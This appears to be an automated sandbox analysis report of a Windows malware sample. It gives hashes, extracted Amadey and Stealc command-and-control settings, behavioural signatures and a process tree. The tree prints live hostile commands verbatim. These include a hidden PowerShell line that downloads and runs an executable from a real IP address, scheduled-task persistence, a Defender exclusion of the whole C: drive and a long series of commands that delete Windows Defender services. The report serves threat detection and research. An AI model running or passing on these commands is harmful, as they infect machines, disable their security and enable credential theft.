Analysis

  • max time kernel
    93s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250313-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/03/2025, 18:59

General

  • Target

    2025-03-26_7ed4e1bef4390c523b41b8932ae245d9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    7ed4e1bef4390c523b41b8932ae245d9

  • SHA1

    6a34c370e538ca02558b2b3f953351363faf4b13

  • SHA256

    bd2990cee56bbb62bb263ccf3b5d0cd7760ec89cb31cc0f1fbe524af346fb7ca

  • SHA512

    68cc639fc830fb12966cdb7f144df0a34cb4331890693d3790d80270d412ca3ffcb0d01693002df2a67832dd1ffda7bc8df3ee48b22f78b77441756a003ecb5a

  • SSDEEP

    24576:iqDEvCTbMWu7rQYlBQcBiT6rprG8a06u:iTvC/MTQYxsWR7a06

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies security service 2 TTPs 2 IoCs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Netsupport family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 14 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Sets service image path in registry 2 TTPs 6 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 12 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 28 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
  • Loads dropped DLL 47 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 23 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 6 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Suspicious use of FindShellTrayWindow 11 IoCs
  • Suspicious use of SendNotifyMessage 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2596
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:12328
    • C:\Users\Admin\AppData\Local\Temp\2025-03-26_7ed4e1bef4390c523b41b8932ae245d9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-03-26_7ed4e1bef4390c523b41b8932ae245d9_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:5960
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn GeFPTma9WGE /tr "mshta C:\Users\Admin\AppData\Local\Temp\OTu1HUmFc.hta" /sc minute /mo 25 /ru "Admin" /f
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5864
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn GeFPTma9WGE /tr "mshta C:\Users\Admin\AppData\Local\Temp\OTu1HUmFc.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:1676
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\OTu1HUmFc.hta
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2968
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZYIKPAE22T2USGFGQWS0TMG3S6TV3LEO.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5540
          • C:\Users\Admin\AppData\Local\TempZYIKPAE22T2USGFGQWS0TMG3S6TV3LEO.EXE
            "C:\Users\Admin\AppData\Local\TempZYIKPAE22T2USGFGQWS0TMG3S6TV3LEO.EXE"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:3768
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Adds Run key to start application
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:4288
              • C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe
                "C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of WriteProcessMemory
                PID:6040
                • C:\Windows\SYSTEM32\cmd.exe
                  cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5800
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell.exe Add-MpPreference -ExclusionPath 'C:'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4328
                • C:\Windows\system32\svchost.exe
                  "C:\Windows\system32\svchost.exe"
                  7⤵
                  • Downloads MZ/PE file
                  • Adds Run key to start application
                  • Suspicious use of WriteProcessMemory
                  PID:4024
                  • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                    "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                    8⤵
                    • Executes dropped EXE
                    PID:4952
                  • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                    "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                    8⤵
                    • Deletes itself
                    • Executes dropped EXE
                    PID:2664
                    • C:\Users\Admin\AppData\Local\Temp\{2de74615-42bc-4970-990d-152b9e3da753}\742859a7.exe
                      "C:\Users\Admin\AppData\Local\Temp\{2de74615-42bc-4970-990d-152b9e3da753}\742859a7.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
                      9⤵
                      • Executes dropped EXE
                      • Checks for VirtualBox DLLs, possible anti-VM trick
                      • System Location Discovery: System Language Discovery
                      PID:4260
                      • C:\Users\Admin\AppData\Local\Temp\{b4b7b297-fb08-4e5b-b36e-1555907bd8c6}\1220b1a7.exe
                        C:/Users/Admin/AppData/Local/Temp/{b4b7b297-fb08-4e5b-b36e-1555907bd8c6}/\1220b1a7.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
                        10⤵
                        • Drops file in Drivers directory
                        • Sets service image path in registry
                        • Executes dropped EXE
                        • Impair Defenses: Safe Mode Boot
                        • Loads dropped DLL
                        • Adds Run key to start application
                        • Enumerates connected drives
                        • Writes to the Master Boot Record (MBR)
                        • Checks for VirtualBox DLLs, possible anti-VM trick
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: LoadsDriver
                        • Suspicious use of AdjustPrivilegeToken
                        PID:7116
              • C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe
                "C:\Users\Admin\AppData\Local\Temp\10337820101\7IIl2eE.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3496
                • C:\Windows\SysWOW64\CMD.exe
                  "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:6064
              • C:\Users\Admin\AppData\Local\Temp\10340260101\c4ab00aec8.exe
                "C:\Users\Admin\AppData\Local\Temp\10340260101\c4ab00aec8.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:2712
              • C:\Users\Admin\AppData\Local\Temp\10340560101\WLbfHbp.exe
                "C:\Users\Admin\AppData\Local\Temp\10340560101\WLbfHbp.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:7528
                • C:\Windows\SysWOW64\CMD.exe
                  "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:7748
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist
                    8⤵
                    • Enumerates processes with tasklist
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    PID:11772
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr /I "opssvc wrsa"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:11788
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist
                    8⤵
                    • Enumerates processes with tasklist
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    PID:12008
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:12024
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c md 267978
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:3692
                  • C:\Windows\SysWOW64\extrac32.exe
                    extrac32 /Y /E Spanish.vss
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:12184
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr /V "East" Removed
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:12668
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:3912
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:12968
                  • C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
                    Exam.com j
                    8⤵
                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:13116
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 13116 -s 944
                      9⤵
                      • Program crash
                      PID:12964
                  • C:\Windows\SysWOW64\choice.exe
                    choice /d y /t 5
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:6468
              • C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe
                "C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:12256
              • C:\Users\Admin\AppData\Local\Temp\10341360101\apple.exe
                "C:\Users\Admin\AppData\Local\Temp\10341360101\apple.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:6856
                • C:\Users\Admin\AppData\Local\Temp\11.exe
                  "C:\Users\Admin\AppData\Local\Temp\11.exe"
                  7⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:6048
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8EDD.tmp\8EDE.tmp\8EDF.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
                    8⤵
                      PID:7468
                      • C:\Users\Admin\AppData\Local\Temp\11.exe
                        "C:\Users\Admin\AppData\Local\Temp\11.exe" go
                        9⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:3292
                        • C:\Windows\system32\cmd.exe
                          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9110.tmp\9111.tmp\9112.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
                          10⤵
                          • Drops file in Program Files directory
                          PID:8892
                          • C:\Windows\system32\sc.exe
                            sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                            11⤵
                            • Launches sc.exe
                            PID:10612
                          • C:\Windows\system32\sc.exe
                            sc start ddrver
                            11⤵
                            • Launches sc.exe
                            PID:1220
                          • C:\Windows\system32\timeout.exe
                            timeout /t 1
                            11⤵
                            • Delays execution with timeout.exe
                            PID:5924
                          • C:\Windows\system32\sc.exe
                            sc stop ddrver
                            11⤵
                            • Launches sc.exe
                            PID:3556
                          • C:\Windows\system32\sc.exe
                            sc start ddrver
                            11⤵
                            • Launches sc.exe
                            PID:5344
                          • C:\Windows\system32\takeown.exe
                            takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                            11⤵
                            • Possible privilege escalation attempt
                            • Modifies file permissions
                            PID:3724
                          • C:\Windows\system32\icacls.exe
                            icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                            11⤵
                            • Possible privilege escalation attempt
                            • Modifies file permissions
                            PID:3844
                          • C:\Windows\system32\sc.exe
                            sc stop "WinDefend"
                            11⤵
                            • Launches sc.exe
                            PID:7520
                          • C:\Windows\system32\sc.exe
                            sc delete "WinDefend"
                            11⤵
                            • Launches sc.exe
                            PID:7484
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                            11⤵
                              PID:7280
                            • C:\Windows\system32\sc.exe
                              sc stop "MDCoreSvc"
                              11⤵
                              • Launches sc.exe
                              PID:7244
                            • C:\Windows\system32\sc.exe
                              sc delete "MDCoreSvc"
                              11⤵
                              • Launches sc.exe
                              PID:7204
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                              11⤵
                                PID:7176
                              • C:\Windows\system32\sc.exe
                                sc stop "WdNisSvc"
                                11⤵
                                • Launches sc.exe
                                PID:3232
                              • C:\Windows\system32\sc.exe
                                sc delete "WdNisSvc"
                                11⤵
                                • Launches sc.exe
                                PID:3512
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                                11⤵
                                  PID:7828
                                • C:\Windows\system32\sc.exe
                                  sc stop "Sense"
                                  11⤵
                                  • Launches sc.exe
                                  PID:7912
                                • C:\Windows\system32\sc.exe
                                  sc delete "Sense"
                                  11⤵
                                  • Launches sc.exe
                                  PID:7956
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                  11⤵
                                    PID:7980
                                  • C:\Windows\system32\sc.exe
                                    sc stop "wscsvc"
                                    11⤵
                                    • Launches sc.exe
                                    PID:8008
                                  • C:\Windows\system32\sc.exe
                                    sc delete "wscsvc"
                                    11⤵
                                    • Launches sc.exe
                                    PID:6024
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                    11⤵
                                    • Modifies security service
                                    PID:8096
                                  • C:\Windows\system32\sc.exe
                                    sc stop "SgrmBroker"
                                    11⤵
                                    • Launches sc.exe
                                    PID:9024
                                  • C:\Windows\system32\sc.exe
                                    sc delete "SgrmBroker"
                                    11⤵
                                    • Launches sc.exe
                                    PID:9232
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                    11⤵
                                      PID:9552
                                    • C:\Windows\system32\sc.exe
                                      sc stop "SecurityHealthService"
                                      11⤵
                                      • Launches sc.exe
                                      PID:9584
                                    • C:\Windows\system32\sc.exe
                                      sc delete "SecurityHealthService"
                                      11⤵
                                      • Launches sc.exe
                                      PID:9648
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                      11⤵
                                        PID:9680
                                      • C:\Windows\system32\sc.exe
                                        sc stop "webthreatdefsvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:9700
                                      • C:\Windows\system32\sc.exe
                                        sc delete "webthreatdefsvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:9728
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                        11⤵
                                          PID:9740
                                        • C:\Windows\system32\sc.exe
                                          sc stop "webthreatdefusersvc"
                                          11⤵
                                          • Launches sc.exe
                                          PID:9780
                                        • C:\Windows\system32\sc.exe
                                          sc delete "webthreatdefusersvc"
                                          11⤵
                                          • Launches sc.exe
                                          PID:9800
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                          11⤵
                                            PID:9844
                                          • C:\Windows\system32\sc.exe
                                            sc stop "WdNisDrv"
                                            11⤵
                                            • Launches sc.exe
                                            PID:9852
                                          • C:\Windows\system32\sc.exe
                                            sc delete "WdNisDrv"
                                            11⤵
                                            • Launches sc.exe
                                            PID:9892
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                            11⤵
                                              PID:9920
                                            • C:\Windows\system32\sc.exe
                                              sc stop "WdBoot"
                                              11⤵
                                              • Launches sc.exe
                                              PID:9952
                                            • C:\Windows\system32\sc.exe
                                              sc delete "WdBoot"
                                              11⤵
                                              • Launches sc.exe
                                              PID:10004
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                              11⤵
                                                PID:10036
                                              • C:\Windows\system32\sc.exe
                                                sc stop "WdFilter"
                                                11⤵
                                                • Launches sc.exe
                                                PID:10064
                                              • C:\Windows\system32\sc.exe
                                                sc delete "WdFilter"
                                                11⤵
                                                • Launches sc.exe
                                                PID:10080
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                                11⤵
                                                  PID:10104
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "SgrmAgent"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:10148
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "SgrmAgent"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:10172
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                  11⤵
                                                    PID:10200
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "MsSecWfp"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:10220
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "MsSecWfp"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:1548
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                    11⤵
                                                      PID:10256
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop "MsSecFlt"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:10296
                                                    • C:\Windows\system32\sc.exe
                                                      sc delete "MsSecFlt"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:10316
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                      11⤵
                                                        PID:10324
                                                      • C:\Windows\system32\sc.exe
                                                        sc stop "MsSecCore"
                                                        11⤵
                                                        • Launches sc.exe
                                                        PID:10360
                                                      • C:\Windows\system32\sc.exe
                                                        sc delete "MsSecCore"
                                                        11⤵
                                                        • Launches sc.exe
                                                        PID:10396
                                                      • C:\Windows\system32\reg.exe
                                                        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                        11⤵
                                                          PID:10420
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                          11⤵
                                                            PID:10456
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                            11⤵
                                                              PID:10488
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                              11⤵
                                                                PID:10504
                                                              • C:\Windows\system32\schtasks.exe
                                                                schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                                11⤵
                                                                  PID:10592
                                                                • C:\Windows\system32\sc.exe
                                                                  sc stop ddrver
                                                                  11⤵
                                                                  • Launches sc.exe
                                                                  PID:10664
                                                                • C:\Windows\system32\sc.exe
                                                                  sc delete ddrver
                                                                  11⤵
                                                                  • Launches sc.exe
                                                                  PID:10692
                                                      • C:\Users\Admin\AppData\Local\Temp\10341760101\dBSGwVB.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10341760101\dBSGwVB.exe"
                                                        6⤵
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        PID:10748
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:3532
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
                                                            8⤵
                                                            • Adds Run key to start application
                                                            • System Location Discovery: System Language Discovery
                                                            PID:11336
                                                          • C:\Users\Public\Netstat\bild.exe
                                                            C:\Users\Public\Netstat\bild.exe
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:11436
                                                      • C:\Users\Admin\AppData\Local\Temp\10342330101\kDveTWY.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10342330101\kDveTWY.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of SetThreadContext
                                                        PID:11996
                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:12096
                                                      • C:\Users\Admin\AppData\Local\Temp\10342650101\cbe532ddb7.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10342650101\cbe532ddb7.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of SendNotifyMessage
                                                        PID:12828
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c schtasks /create /tn av4KSmaWYjz /tr "mshta C:\Users\Admin\AppData\Local\Temp\rZEWsPEQt.hta" /sc minute /mo 25 /ru "Admin" /f
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:12780
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /create /tn av4KSmaWYjz /tr "mshta C:\Users\Admin\AppData\Local\Temp\rZEWsPEQt.hta" /sc minute /mo 25 /ru "Admin" /f
                                                            8⤵
                                                            • System Location Discovery: System Language Discovery
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:12720
                                                        • C:\Windows\SysWOW64\mshta.exe
                                                          mshta C:\Users\Admin\AppData\Local\Temp\rZEWsPEQt.hta
                                                          7⤵
                                                          • Checks computer location settings
                                                          • System Location Discovery: System Language Discovery
                                                          PID:12764
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XPBL8IZRJ5NDKL8XCDVYF1K7LEKN9EOJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                            8⤵
                                                            • Blocklisted process makes network request
                                                            • Command and Scripting Interpreter: PowerShell
